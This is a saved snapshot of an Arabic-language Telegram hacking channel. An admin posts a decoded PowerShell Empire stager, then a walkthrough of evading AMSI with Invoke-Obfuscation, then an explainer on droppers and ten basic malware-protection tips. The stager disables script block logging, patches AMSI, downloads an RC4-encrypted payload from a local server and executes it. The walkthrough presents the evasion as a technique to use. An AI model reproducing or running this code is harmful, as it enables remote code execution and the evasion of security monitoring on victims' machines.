这是用户在 2024-4-28 17:52 为 https://web.telegram.org/k/#@GlobalGreyHatTeam 保存的双语快照页面,由 沉浸式翻译 提供双语支持。了解如何保存?
April 18
April 18
نقوم الأن بعمل base64 decode لنحصل على الكود التالي :13:08
13:08
𝗕𝗟𝗔𝗖𝗞admin
If($PSVeRsIOnTablE.PSVErSIon.MAjoR -gE 3){$GPF=[ref].ASsEmblY.GeTTYpe('System.Management.Automation.Utils')."GEtFiE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GeTValUE($nULL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[COlLectIonS.GenEriC.DIcTioNary[STrINg,SystEM.Object]]::NeW();$Val.ADd('EnableScriptB'+'lockLogging',0);$Val.AdD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAL}ELsE{[SCRIPtBLoCK]."GetFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-ObJecT CoLLEcTiOns.GENeric.HaSHSeT[sTrIng]))}[ReF].AsseMBlY.GETTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIelD('amsiInitFailed','NonPublic,Static').SEtVALue($NULl,$TruE)};};[SystEm.NET.SerVicEPointMANaGER]::EXpect100ConTInUe=0;$wc=NeW-OBjeCt SYSTEm.NET.WEbCliENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeaDERs.AdD('User-Agent',$u);$wc.PROXY=[SYSTEm.NEt.WebRequEst]::DeFaulTWEBProXY;$wc.PrOXy.CrEDENtiALs = [SysteM.Net.CReDEntIAlCAche]::DefAuLtNeTWORkCredENTIaLS;$Script:Proxy = $wc.Proxy;$K=[SYStEM.TEXt.EncODINg]::ASCII.GEtBytEs('m#6~k9,C+5H^t4YLr}v3DOJwU&hNIK<d');$R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXor$S[($S[$I]+$S[$H])%256]}};$ser='http://192.168.178.1:8888';$t='/news.php';$wc.HeadErs.ADD("Cookie","session=d9H/ETeDwEi0oyqmQi1LjEQ9rz4=");$datA=$WC.DoWNloADDAta($sER+$T);$iV=$dAta[0..3];$DAta=$dAtA[4..$DAta.LENGTH];-joiN[ChaR[]](& $R $dATa ($IV+$K))|IEX
13:09
13:09
𝗕𝗟𝗔𝗖𝗞admin
لو حاولنا أن احنا نحاول نشغله بشكل مباشر على Powershell بعد ما نحطه جوا ملف إسمه NotAMalware.ps1 على الـ webserver الخاص بينا بعد سحبه من خلال DownloadString هناخد في الاخر13:10
13:10
𝗕𝗟𝗔𝗖𝗞admin
𝗕𝗟𝗔𝗖𝗞
Photo, لو حاولنا أن احنا نحاول نشغله بشكل مباشر على Powershell بعد ما نحطه جوا ملف إسمه NotAMalware.ps1 عل...
كما نرى بالفعل لقد منعت الـ AMSI تنفيذ الـ powershell code الخاص بالـ empire agent الخاص بنا !13:10
13:10
𝗕𝗟𝗔𝗖𝗞admin
قمت بإستدعاء $error لكي نرى المشكلة بشكل أفضل. حسناً , الأن لكي نقوم بتخطي الـ AMSI من خلال إعادى ترتيب النصوص وعمل obfuscate لها , يوجد هناك أداة رائعة جداً مكتوبة بلغة Powershell تُسمى Invoke-Obfuscation , حيث تتيح لك تغير شكل النصوص الخاصة بـ powershell script مُعين من خلال التلاعب بالنصوص وطريقة كتابتها , سوف أقوم بتشغيل الأداة من خلال pwsh وهو مُحاكي لـ powershell على أنظمة Linux13:11
13:11
𝗕𝗟𝗔𝗖𝗞admin
https://github.com/danielbohannon/Invoke-Obfuscation
GitHub
GitHub - danielbohannon/Invoke-Obfuscation: PowerShell Obfuscator
PowerShell Obfuscator. Contribute to danielbohannon/Invoke-Obfuscation development by creating an account on GitHub.
13:11
13:11
𝗕𝗟𝗔𝗖𝗞admin
𝗕𝗟𝗔𝗖𝗞
https://github.com/danielbohannon/Invoke-Obfuscation
و هذه الاداة ستفيدك13:11
13:11
𝗕𝗟𝗔𝗖𝗞admin
April 21
April 21
الـ"Dropper" في عالم المالوير، ده زي الحقنة اللي في بتديها للكمبيوتر بتاعك يعني، بيبقى برنامج صغير جدًا مهمته الوحيدة هو ينزل برنامج تاني و ده الفيروس أو التروجان في العادة يا رجالة الـ"Dropper" بيكون جزء من حزمة تروجان زي الفيروس بيكون معمول ليه حقن في برنامج ظاهر شكله برنامج عادي و لما تفتحه و تنزله على جهازك بيبدأ الـ"Dropper" في تشغيل نفسه وينزل الفيروس على الجهاز فكرة الـ"Dropper" بسيطة زي لما حد يديك حاجة و يقولك "خد الحاجة ، دى حاجة طرش "، بس لما تفتحه تلاقي إن ده مكنوز فيه حاجات تانية زي الفيروسات و المالويرات (:09:55
09:55
𝗕𝗟𝗔𝗖𝗞admin
طبعًا، في الأول عايزين نفهم إن البرمجيات الخبيثة دي بتيجي بطرق كتير، ولكن هنا عشر طرق تقدر تستخدمها عشان تحمي نفسك: 1. تحديث البرامج: يبقى دايماً لازم تحدّث البرامج بتاعتك، يعني الويندوز، والمتصفح، والبرامج اللي بتستخدمها، عشان الشركات بيصلحوا فيها الثغرات الأمنية. 2. استخدم برامج الحماية: زي الأنتي فيروس والأنتي مالوير، دي بتساعدك تشيك على الملفات اللي بتحملها وتحميك من الفيروسات. 3. الحذر من البريد الإلكتروني: لازم تكون حذر من الرسايل اللي بتجيلك على الإيميل، خصوصًا لو فيها مرفقات أو روابط، لأنها قد تكون مصدر فيروسات. 4. عدم تحميل برامج من مواقع غير موثوقة: يعني متحملش برامج من أي موقع، خصوصًا لو كان موقع غير معروف، عشان ممكن تكون فيها برامج مصابة. 5. استخدم كلمات مرور قوية: اختار كلمات مرور معقدة، مكونة من حروف كبيرة وصغيرة وأرقام ورموز، عشان يكون صعب للهاكرز يخمنوها. 6. التحقق من الروابط قبل الضغط عليها: لما تجيلك رسالة أو منشور على مواقع التواصل الاجتماعي فيه رابط، اتأكد إنه آمن قبل ما تضغط عليه. 7. قفل ملفاتك بكلمة مرور: خصوصًا الملفات الحساسة، احفظها في مجلدات محمية بكلمة مرور. 8. استخدام شبكة واي فاي آمنة: تجنب استخدام شبكات الواي فاي العامة والمفتوحة، لأنها قد تكون مصدرًا للاختراق. 9. تفعيل جدار الحماية: جدار الحماية بيساعدك يقفل الوصول لجهازك من الخارج، فاعمله دايماً. 10. النسخ الاحتياطي للبيانات: دايماً عمل نسخة احتياطية لملفاتك المهمة، عشان لو حصل أي شيء، تقدر تسترجعها بسهولة.
3
1
10:38
10:38
𝗕𝗟𝗔𝗖𝗞admin